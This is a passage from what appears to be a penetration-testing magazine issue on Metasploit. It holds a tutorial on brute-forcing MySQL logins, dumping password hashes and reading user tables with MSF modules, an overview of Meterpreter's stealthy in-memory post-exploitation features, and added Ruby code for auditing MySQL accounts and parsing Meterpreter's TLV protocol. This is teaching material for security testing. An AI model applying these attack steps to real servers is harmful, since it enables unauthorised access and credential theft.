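def audit(netsh: NETSH_OPMODE, sc_qc: SC_QC, tasklist: TASKLIST_SVC, events: EVENTS)
  findings = disabled_firewall_profiles(netsh).map { |p| "firewall disabled: #{p} profile" }
  sc_qc.each { |svc, out| findings << "AV service start type DISABLED: #{svc}" if start_type_disabled?(out) }
  missing_av_services(tasklist).each { |svc| findings << "AV service not running: #{svc}" }
  tamper_events(events).each { |e| findings << "event #{e[:id]} in #{e[:log]} log: #{e[:message]}" }
  findings
end

puts audit if $PROGRAM_NAME == __FILE__
```

On a live host the same functions can be fed the real command output captured with backticks; the event records would come from the Event Log rather than the constructed array.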
We have seen how to exploit a vulnerability on a remote system. We have seen how to gain access to it remotely using MSF. We have also seen how we can disable the Firewall and Anti-virus running on a system using MSF. Now, we shall move to another interesting area. We will attack databases with the Metasploit Framework. I thought that this could be the last demonstration for this issue on using the Metasploit Framework, but it will definitely be a very useful demonstration since MySQL is very common on the internet today, more common than Oracle. In most of the penetration tests that I have done for my clients, I have found at least one system running a MySQL server. I'm sure that most of you face similar situations. In this demonstration I will show you how you can attack a MySQL database using MSF. I suggest running a Linux operating system with the MySQL server, and setting that up on your Virtual Machine. It's really not difficult to do, you just need to download the right files from the right places and set them up. Setting up the MySQL server isn't really in the scope of this article. Here, I'm going to try and concentrate on attacking the setup. You can probably find some nice tutorials on setting up the MySQL server using Google. So, after setting up the MySQL Server on a Virtual Machine and starting the required services, you would need to find the IP address of the target machine using ifconfig. Now, before we even begin our attack, we should find out more about the MySQL Server running on the target box. Knowing the version of a service running on the target always helps since it allows us to find multiple vulnerabilities and sometimes even 0days for that particular version of the software. So, we can do this by loading an MSF module using the command use auxiliary/scanner/mysql/mysql_version (Figure 32). Now, the only thing we need is the remote IP address (IP address of the target machine) to execute this module and find the MySQL server version. This we have already found. If you haven't, you can find it. After you do, you must set the RHOST value to the target IP address and then execute it by using the command run, as follows: Figure 33.
Figure 33. Running the version check and discovering the MySQL server version
Looking at the output, we can easily figure out that the target box is running MySQL 5.0.51a-3ubuntu5 (protocol 10). This information is very useful to us, as we can find exploits for it using simple Google searches. Now, you might be thinking, "Ok, let's Google for an exploit for the MySQL version and pwn this box!!" No, I suggest one step before that. Try running a script that checks if the server is using default username-password combinations. A lot of server administrators forget to put passwords on default accounts and that just makes our job easier. So, I'm going to run a scan for that. This is a kind of brute-force against the MySQL server. What you are basically doing is brute-forcing the logins. Luckily, MSF offers a module for that! This module is called mysql_login. You can use this module by running the command use auxiliary/scanner/mysql/mysql_login. The mysql_login module can be used in conjunction with your word-lists in order to discover at least one valid database account. This checks the MySQL database for weak credentials and is a good practice. There are three variables that you need to set: RHOST, USER_FILE and PASS_FILE. USER_FILE contains possible usernames. PASS_FILE contains a list of passwords. These two files can be text files (.txt) or list files (.lst), with the full path as shown: Figure 34. You can run the module with the run command as shown above. After looking at the output of the scanner, you will see that the scanner has been successful (unless of course you have added strong passwords to the guest and root accounts). This is a demonstration, hence I'll not be going into the process of brute-forcing username and password combinations.
After running the module, you should see output like Figure 35. Before connecting to the MySQL server directly using the login information, we can use two other MSF modules to enumerate the database and dump credential information. The two modules that we will be using are mysql_enum and mysql_hashdump. This can be done manually, but knowing that an automation module for this process exists, we would tend to do it the easy way. Mysql_enum is used to find information about the various database accounts on the remote MySQL server. But we will need to configure three variables to do so: RHOST, USERNAME and PASSWORD. But since the password of the root account is blank, we do not need to set the PASSWORD variable. After configuring the module, you can run it with the run command (Figure 36). Sample output of the command is: Figure 37. Now, it is time to configure the mysql_hashdump module to dump the password hashes belonging to the various database user accounts. Again, the same variables need to be set as for the previous module. After configuring the module, you can run it using the run command, as follows: Figure 38. After this process is complete, we can make a direct connection to the target MySQL server using a mysql client. Since the attacker box is running BackTrack 5, the mysql client is pre-installed. You can run it with the following syntax: mysql -h <IP> -u <username> -p<password> (the password follows -p with no space; with a space, the client prompts for a password and treats the next word as a database name). Replace the required parts of the command and run it. This is how it looks after the connection is established (Figure 39).
Figure 39. Connecting to the target MySQL Server using the discovered credentials
Now that the mysql connection has been established, you can run various commands to hit the jackpot! You can use the show databases; command to display a list of databases on the server. You might get something like this: Figure 40. Now, let me assume that you might be interested in the database called mysql. You can now use
the mysql database using the command use mysql. It will show you a message which acknowledges that the database has been changed. After that, you can run the command show tables; to list the tables in the current database (in this case mysql) (Figure 41). Now, the most interesting table here is the one called user. If user has two columns called username and password, then you can extract the data from the table user using the command select username, password from user; On running that command, you should see something similar to the output shown in Figure 42. We can now see that there are three users with no password. You may now decide that you want to see the tables in the database owasp10. You can do that by running the command show tables from owasp10;. Now, you'll see the tables present in the owasp10 database. You might see something like this: Figure 43. You can go on like this till you find the information that you are hired to find. Remember, these tables were created well in advance for the sake of demonstrating various commands for this tutorial. You will not find all of these tables in your installation unless you create them before you launch this attack. The methods described here are solely for teaching you the various techniques that may be used for exploiting machines using MSF. It is to show how useful MSF is in real-world scenarios. In the beginning of this issue, I pointed out that MSF makes it very easy for us to configure and deploy exploits. I have shown you how simple it is to use the msfconsole, which is the CLI for the Metasploit Framework. Configuring exploits was really easy. I suggest that you all try as many exploitations as you legally can. Do not use these techniques to do anything illegal; that is not the purpose of these tutorials. These articles and instructions are mainly to break the ice and introduce you to the most common and simplest of exploitation frameworks out there. I would like you all to try your attacks either on a war-gaming server or, better, on your virtual machines, using the Metasploitable VMware image. You can find out more by following this link: http://www.offensive-security.com/metasploit-unleashed/Metasploitable. I have only demonstrated a few of the existing MSF scripts which may be used in various attacks. They are extremely helpful (but sometimes fail, as we have seen when we tried to kill our AV). I suggest reading about the rest of the MSF scripts here: http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts.
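The weak accounts that mysql_login and mysql_hashdump turn up in the MySQL section above (a blank root password, three users with no password at all) are exactly what a MySQL administrator should audit for. As an added example, not from the article or from Metasploit, here is a Ruby script that audits rows of mysql.user and emits the SET PASSWORD / DROP USER statements that fix each finding. The rows are constructed; the column names follow MySQL 5.0 as on the server in the article (5.7+ stores the hash in authentication_string instead), and the hash value is a placeholder.

```ruby
# Added example, not from the article: audit the MySQL account table for the weaknesses that
# the mysql_login and mysql_hashdump modules exploit, and emit the fix for each one.
# Column names follow MySQL 5.0 (User, Host, Password). Rows are constructed, not dumped.
AUDIT_SQL = 'SELECT User, Host, Password FROM mysql.user'.freeze

FAKE_HASH = ('*' + 'A' * 40).freeze # placeholder standing in for a real 41-character MySQL hash

SAMPLE_USERS = [
  { user: 'root',  host: 'localhost', password: '' },
  { user: 'root',  host: '%',         password: '' },
  { user: '',      host: 'localhost', password: '' }, # anonymous account
  { user: 'guest', host: '%',         password: FAKE_HASH },
  { user: 'app',   host: '10.0.0.5',  password: FAKE_HASH }
].freeze

# Weaknesses of one row; an empty list means the account passed every check.
def account_findings(row)
  findings = []
  findings << :anonymous_user if row[:user].empty?
  findings << :empty_password if row[:password].empty?
  findings << :wildcard_host  if row[:host] == '%'
  findings << :remote_root    if row[:user] == 'root' && row[:host] != 'localhost'
  findings
end

# [row, findings] for every account that failed at least one check.
def weak_accounts(rows)
  rows.map { |r| [r, account_findings(r)] }.reject { |_, f| f.empty? }
end

# Single-quote a MySQL string literal (embedded quotes doubled).
def sql_quote(str)
  "'" + str.gsub("'", "''") + "'"
end

# Statements that remove the weakness (MySQL 5.0 syntax); the new password is a placeholder.
def remediation_sql(row, findings)
  acct = "#{sql_quote(row[:user])}@#{sql_quote(row[:host])}"
  return ["DROP USER #{acct};"] if findings.include?(:anonymous_user) || findings.include?(:remote_root)
  stmts = []
  stmts << "SET PASSWORD FOR #{acct} = PASSWORD('<strong-password>');" if findings.include?(:empty_password)
  stmts << "-- #{acct}: replace host '%' with the network or host that actually needs access" if findings.include?(:wildcard_host)
  stmts
end

# Full hardening script for a result set of AUDIT_SQL.
def hardening_script(rows)
  weak_accounts(rows).flat_map { |row, findings| remediation_sql(row, findings) }
end

puts hardening_script(SAMPLE_USERS) if $PROGRAM_NAME == __FILE__
```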
The best place to learn more about the Metasploit Framework is the official website of Metasploit. It goes through everything from the basics to the more advanced techniques. I would like all of you to read up from here: http://www.offensive-security.com/metasploit-unleashed/Main_Page. There are many parts of the Metasploit Framework that are not really in the scope of this issue; I may cover them in future issues if the editorial board of Hakin9 permits. Armitage, SET (Social Engineering Toolkit) and Fast-Track are some important things you can read about. If you need a complete MSF module reference, you can find one online on the official Offensive Security website: http://www.offensive-security.com/metasploit-unleashed/Module_Reference. Why read from some other source, when the creators themselves put it up in a neat way? This link is definitely a must-read for everybody. A lot of exploits may not be directly included in Metasploit. MSF offers the flexibility of writing your own exploits and modules and including them in the Framework. But another place where there are up-to-date public exploits, as a searchable database, is http://www.exploit-db.com/. You can also go through some of the papers there, a lot of very well written stuff. After going through this issue, you might just feel like writing exploits yourself. There are very few places on the internet that actually offer tutorials for this. The best place that gives you an idea of exploit-writing, from the very basic stack-based overflows to the more advanced exploits, is http://corelan.be/. Well, I think I've covered most of what I wanted to. I'd like to thank the Hakin9 team for giving me this opportunity to write for this issue. I'm very glad and extremely grateful. I hope they give me such opportunities in the future as well. Cheers!
www.abhinavdas.in @theabhinavdas
Abhinav Das
Metasploit: Part-I
by Sudhanshu Chauhan
When it comes to penetration testing and a single tool is required to own all the boxes, the Metasploit Framework is the one-stop shop. The Metasploit Framework, better known as MSF, is an advanced open-source tool written in Ruby which provides security researchers and pentesters a framework to develop and launch exploits, payloads, encoders, exploration and other security testing tools.
MSF initially started as a collection of exploits, but as the technology advanced it began to grow in size as well as functionality. Currently it provides capabilities for the design and development of reconnaissance, exploitation and post-exploitation security tools. It ranks second on SecTools.Org: Top 125 Network Security Tools (Source: Sectools.org). Metasploit was originally developed by HD Moore in 2003 as a network tool. Initially it was created using the scripting language Perl, but later on it was completely rewritten in the Ruby programming language. Today it is one of the largest Ruby projects, with more than 700,000 lines of code. The Metasploit project was acquired on October 21, 2009 by Rapid7, a company that provides security risk intelligence solutions. Figure 1 shows a screenshot of the Metasploit console. Some of the terms used above (and further in the article) are clarified below:
Exploit: A piece of software, a data chunk, or a command sequence that takes advantage of a bug, vulnerability or bad configuration in order to cause unintended or unanticipated behavior to occur on computer software or hardware.
Payload: The essential data that is being carried within a packet or other transmission unit. It is basically the code that will be executed on the target system upon successful exploitation.
Encoders: Ways to twist the code such that anti-malware applications/IDS/IPS won't detect the payload.
The basic exploitation steps using the Framework are:
Choosing and configuring an exploit;
Validating whether the chosen system is susceptible to the chosen exploit (optional);
Choosing and configuring a payload;
Choosing the encoding technique to encode the payload;
Executing the exploit.

Figure 2 displays the exploitation process through an example of a successful Windows 7 machine exploitation. One of the major advantages of the MSF is the modularity of allowing any exploit to be combined with any payload. It assists the tasks of all the attackers, the exploit writers, and the payload writers, and hence has become the tool of choice for anybody related to information security (or insecurity). To initialize the process of exploitation, some information is required about the target system (like OS/browser version). This information can be collected via techniques like port scanning, OS fingerprinting, banner grabbing etc. Some of the best tools of the trade for these techniques are nmap (network mapper), Nessus (vulnerability scanner) etc. Based on this information the exploit and payload are chosen and the exploitation process advances. Metasploit has the ability to import vulnerability scan records and match the identified vulnerabilities to existing exploit modules for accurate exploitation, and this ability is what makes MSF one of the

MSF Environments
The Metasploit framework has four work environments, the msfconsole, msfcli, msfweb and msfgui (newly introduced) interfaces, each with their own strengths and weaknesses. All these interfaces are explained below.

Msfconsole
The msfconsole is the traditional and primary means of using the MSF. It provides a centralized console and allows efficient access to virtually all of the options available in the Metasploit framework. After installation, the console can be launched simply by typing the command ./msfconsole. Figure 3 shows the msfconsole interface. Pros and Cons: It is the most well supported way to access all (almost) the features within Metasploit. It is the most stable MSF interface. Full readline support, tabbing and command completion are available. External command execution is possible. Not as point-and-click as msfgui/msfweb.
Figure 3. msfconsole

Msfcli
The msfcli interface allows exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. But it can handle only one shell at a time, which makes it quite impractical for client-side attacks. Figure 4 shows the msfcli interface. Pros and Cons: It is easy to use and hence good for learning. Ideal for use in scripts and simple automation. Only one shell can be handled at a time. Not as well supported as msfconsole.
Figure 4. msfcli

Msfweb
Msfweb provides the user with a browser-based interface to access and launch exploits, but is not a recommended interface as it is not very stable and is not being actively developed. It is good for demonstration purposes only. Figure 5 shows msfweb. Pros and Cons: It provides a pretty, easy-to-use interface. Good for demonstrating the exploitation to management/laymen. Not as well supported as msfconsole. Slower and less stable.
Figure 5. msfweb

Msfgui
A new GUI for Metasploit was added to the Metasploit SVN repository in 2010, which provides the functionality of msfconsole in addition to many new features. This new GUI is multi-platform and is based on Java. It provides a better interface than Msfweb and is more stable. Figure 6 shows msfgui. Pros and Cons: Provides a very stable GUI. Easy to implement and use. Requires comparatively more memory.
Figure 6. msfgui
Before using MSF for exploit development and/or pentesting it would be useful to learn some basic commands and their functionality. Below is a set of most frequently used commands.
help: The 'help' command does what its name suggests: it gives basic information on all the commands.
search <keyword here>: Inputting the command search along with a keyword lists the various exploits and payloads that have that keyword pattern in them.
show exploits: The command 'show exploits' lists the currently available exploits.
show payloads: Using the same 'show' command, we can also list the payloads available.
show options: Typing in the command 'show options' will show the options that have been set. Each exploit and payload comes along with its own options that can be set.
info <type> <name>: To get specific information on an exploit or payload, use the 'info' command.
use <exploit name>: This command tells Metasploit to use the exploit with the specified name.
set RHOST <hostname/ip>: This command is used to instruct Metasploit to target the specified remote host.
set RPORT <remote port>: This command sets the port that Metasploit will connect to on the remote host.
set PAYLOAD <payload name>: This command sets the payload that is to be used and will provide a shell when a service has been exploited.
set LPORT <local port>: This command sets the port number that the payload will open on the server machine when a service is exploited. One thing to note here is that the provided port number should not be reserved or already in use on the machine.
exploit: Actually launches the exploit code against the service to be exploited.
sessions -l: Displays and controls sessions between the user and targeted hosts.
sessions -i <ID>: Various sessions on the exploited systems can be accessed using this command, where ID specifies the session to be interacted with.
Anything that can run from the command line.
MSF Exploits can be divided into two categories namely active and passive based on the way they operate.
Figure 7. Meterpreter
Active exploit
An active exploit will execute until completion, exploit a specific host machine and finally exit. Brute-force modules will exit when a shell opens on the victim. In case an error is encountered, the module execution will stop. An active module can be forced to the background by passing -j to the exploit command.
Passive exploit
A passive exploit holds and waits for an incoming host and exploits them as they connect. These exploits mostly focus on clients (web browsers, FTP clients, etc.), i.e. they need intervention from the victim user's side. Passive exploits report shells as they happen and can be enumerated by passing sessions -l, which displays and controls sessions between the user and targeted hosts. Sessions on the exploited systems can be accessed using the sessions -i command, along with the session ID.

MSF provides three different payload modules: Singles, Stagers and Stages. Each payload provides different functionality and is suitable for different scenarios.

Singles
They are self-contained payloads which do a specific task. E.g. windows/adduser.

Stagers
Stagers create a network connection between attacker and victim; they are required as singles cannot deliver an arbitrarily large payload in one shot (depending upon the exploit). E.g. windows/shell/bind_tcp (Bind TCP Stager).

Stages
Stages are payload components that are downloaded by stagers and executed. They typically do complex tasks like VNC, Meterpreter etc. E.g. windows/shell/bind_tcp (Windows Command Shell).

Meterpreter
Explanation of the Metasploit payloads cannot be complete without an explanation of Meterpreter, an advanced payload included in MSF. The way to look at Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system. Meterpreter is short for Meta-Interpreter, which is a multi-faceted, dynamically extensible payload that uses in-memory DLL injection and is runtime extensible over the network. DLL injection is a technique used to execute code inside the address space of a different process by forcing it to load a dynamic-link library. The striking features which make Meterpreter stand out from other payloads are as follows: It does not create a new process. It does work in chrooted environments. It does allow for robust extensibility. Meterpreter and all of the extensions that it loads are executed completely from memory and never touch the target's disk, thus leaving no trace on the hard disk, which allows them to execute under the radar of standard anti-virus detection/forensic techniques. Scripts and plugins can be loaded, executed and unloaded dynamically as and when required. Figure 7 demonstrates the Meterpreter core command list.

Meterpreter is designed in such a manner that it can work on various different platforms, provided that there is a means by which shared objects can be loaded from memory. This makes it possible to have a single Meterpreter client that is capable of running modules which are designed and developed to compile on a variety of platforms and architectures. Meterpreter can be considered as a typical command interpreter which has a command line and a set of commands that can be executed. The functionality it provides is that the Meterpreter client can control the set of commands by injecting new extensions at runtime. As the extensions can potentially be applicable across platforms and architectures, the Meterpreter client can use the same client interface (and command set) to control the extensions regardless. It communicates over the stager socket and offers a wide-ranging client-side Ruby API. Metasploit has a full-featured Ruby client API.

How it works (source: http://www.offensive-security.com/metasploit-unleashed): The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc. The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL. The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client. Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol.

compromised process and creates no new processes. It can also migrate to other running processes easily. By default, Meterpreter uses encrypted communications, which makes it even stealthier.

Powerful
Meterpreter utilizes a channelized communication system and provides some powerful features like uploading/downloading files, retrieving password hashes, and scripts to automate common post-exploitation tasks.

Extensible
Features can be injected on the fly and are loaded over the network. New features can be added to Meterpreter without rebuilding it. This can be done by loading extensions. The client can upload the DLL over the socket, which will be loaded in memory by the server running on the victim and initialized. The new extension will register itself with the server. The client on the attacker's machine loads the local extension API and can call the extension's functions.

Command Reference (source: http://dev.metasploit.com/documents/meterpreter.pdf). Some common commands provided by Meterpreter:
use: The use command is used to load Meterpreter extensions. These extensions typically provide more advanced commands and features to both the client and the server.
read: This command reads data that has been output by the remote server's side of the channel. A maximum amount of data to read can optionally be specified as the length parameter.
write: This command writes an arbitrary amount of data to the input handler on the remote server's end of the channel. This is a non-interactive method by which data can be sent to the remote server's end of the channel. Once the command is issued, data can be typed on the client's side until complete. Once complete, a . should be issued on an empty line, thus symbolizing the end of the input.
close: This command closes a channel and frees its resources. After a channel is closed it cannot be read from, written to, or interacted with. Most channels close automatically.
interact: This command starts an interactive session with the channel specified in channel id. To terminate the interactive session a Ctrl-C must be issued. A prompt will be given asking whether or not the interactive session should really be terminated.
initcrypt: This command provides the client with the ability to enable an arbitrary cipher which will, as a result, encrypt the Value field of all the packets sent between the client and the server, excluding those which are explicitly PLAIN. The only supported cipher at the time of this writing is XOR, but the framework exists for adding custom ciphers.
upload: This command allows the client to upload files from the local machine to the remote server. The command allows for specifying one or more files that are local to the client machine and are to be uploaded to the directory specified in dst on the remote server.
download: This command allows the client to download files from the remote server to the local client's machine. The command allows for specifying one or more files that are to be downloaded to the directory specified in dst.
portfwd: This command is an advanced means by which TCP connections can be tunneled through the connection between the client and the server to hosts on the server's network. This allows the client to access hosts on the server's network which may not otherwise be directly accessible. It is also useful for chaining exploits.
execute: This command is used to execute an application on the remote server, optionally channelizing the input and output. When the input and output are channelized by using the -c parameter, it is possible for the client to read, write, and interact with the executable on the server.
kill: This command provides a means by which processes on the remote server can be terminated.
getuid: Provides the username that is associated with the currently logged in user for the process.
sysinfo: Provides information about the target host such as the computer's name and its OS version string.
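The "How it works" description of Meterpreter above ends with the extensions being loaded "using a TLV protocol". As an added example, not Meterpreter's own code, the following Ruby encoder/decoder shows that framing: every field is a length-prefixed type/value triple and a packet is a group of them, which is what an analyst dissecting a decrypted Meterpreter session has to parse. The meta-type bit values and the METHOD, REQUEST_ID and RESULT type numbers follow the Metasploit packet definitions; the size bound, the sample request and the helper names are this example's own.

```ruby
# Added example, not Metasploit's code: a minimal Meterpreter-style TLV codec.
# Every TLV is [length: 4 bytes big-endian, counting this 8-byte header][type: 4 bytes][value].
# High bits of the type say how to interpret the value; low bits identify the field.
TLV_META_TYPE_STRING = 1 << 16
TLV_META_TYPE_UINT   = 1 << 17
TLV_META_TYPE_RAW    = 1 << 18
TLV_META_TYPE_BOOL   = 1 << 19
TLV_META_TYPE_GROUP  = 1 << 30

# Field identifiers present in every request/response (values as in the Metasploit packet definitions).
TLV_TYPE_METHOD     = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_RESULT     = TLV_META_TYPE_UINT   | 4

# A packet is itself an 8-byte header whose "type" is the packet type, followed by nested TLVs.
PACKET_TYPE_REQUEST  = 0
PACKET_TYPE_RESPONSE = 1

MAX_TLV_LEN = 1 << 20 # decoder sanity bound (this example's assumption, not a protocol constant)

def encode_tlv(type, value)
  body =
    if (type & TLV_META_TYPE_GROUP) != 0
      value.map { |t, v| encode_tlv(t, v) }.join.b  # nested [type, value] pairs
    elsif (type & TLV_META_TYPE_STRING) != 0
      value.b + "\x00".b                            # strings are NUL-terminated on the wire
    elsif (type & TLV_META_TYPE_UINT) != 0
      [value].pack('N')
    elsif (type & TLV_META_TYPE_BOOL) != 0
      [value ? 1 : 0].pack('C')
    else
      value.b                                       # RAW: bytes as given
    end
  [body.bytesize + 8, type].pack('NN') + body
end

def encode_packet(packet_type, tlvs)
  body = tlvs.map { |t, v| encode_tlv(t, v) }.join.b
  [body.bytesize + 8, packet_type].pack('NN') + body
end

# Walks a byte string of consecutive TLVs. Raises on a length that does not fit the buffer,
# which is the check any parser of untrusted input must make before slicing.
def decode_tlvs(buf)
  tlvs = []
  off = 0
  while off < buf.bytesize
    raise ArgumentError, 'truncated TLV header' if buf.bytesize - off < 8
    len, type = buf.byteslice(off, 8).unpack('NN')
    if len < 8 || len > MAX_TLV_LEN || off + len > buf.bytesize
      raise ArgumentError, "bad TLV length #{len} at offset #{off}"
    end
    raw = buf.byteslice(off + 8, len - 8)
    value =
      if (type & TLV_META_TYPE_GROUP) != 0 then decode_tlvs(raw)
      elsif (type & TLV_META_TYPE_STRING) != 0 then raw.chomp("\x00".b)
      elsif (type & TLV_META_TYPE_UINT) != 0 then raw.unpack1('N')
      elsif (type & TLV_META_TYPE_BOOL) != 0 then raw.unpack1('C') != 0
      else raw
      end
    tlvs << [type, value]
    off += len
  end
  tlvs
end

def decode_packet(buf)
  raise ArgumentError, 'short packet' if buf.bytesize < 8
  len, packet_type = buf.byteslice(0, 8).unpack('NN')
  raise ArgumentError, 'packet length mismatch' unless len == buf.bytesize
  { type: packet_type, tlvs: decode_tlvs(buf.byteslice(8, len - 8)) }
end

# First value carried under a given TLV type, or nil.
def tlv_value(tlvs, type)
  pair = tlvs.find { |t, _| t == type }
  pair && pair[1]
end

# Constructed round trip: a request naming a method and its response carrying a result code.
def demo_roundtrip
  req = encode_packet(PACKET_TYPE_REQUEST,
                      [[TLV_TYPE_METHOD, 'core_channel_open'], [TLV_TYPE_REQUEST_ID, '12345678']])
  resp = encode_packet(PACKET_TYPE_RESPONSE,
                       [[TLV_TYPE_METHOD, 'core_channel_open'], [TLV_TYPE_REQUEST_ID, '12345678'],
                        [TLV_TYPE_RESULT, 0]])
  [decode_packet(req), decode_packet(resp)]
end

p demo_roundtrip if $PROGRAM_NAME == __FILE__
```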
Conclusion
This article provided a high-level introduction to the Metasploit Framework and its usage. Metasploit is not just an exploitation framework; it also provides some great post-exploitation and security testing features which certainly take pentesting to the next level. Meterpreter's ability to inject libraries in memory makes it the ideal vector for stealth. With Meterpreter's complete integration into the Metasploit Framework, it can easily be used with future exploits. With very strong and constantly evolving Metasploit development, it is hoped that new and existing modules will be developed and extended to make the Metasploit framework an even more powerful tool. Reference Website: http://www.offensive-security.com/metasploit-unleashed/.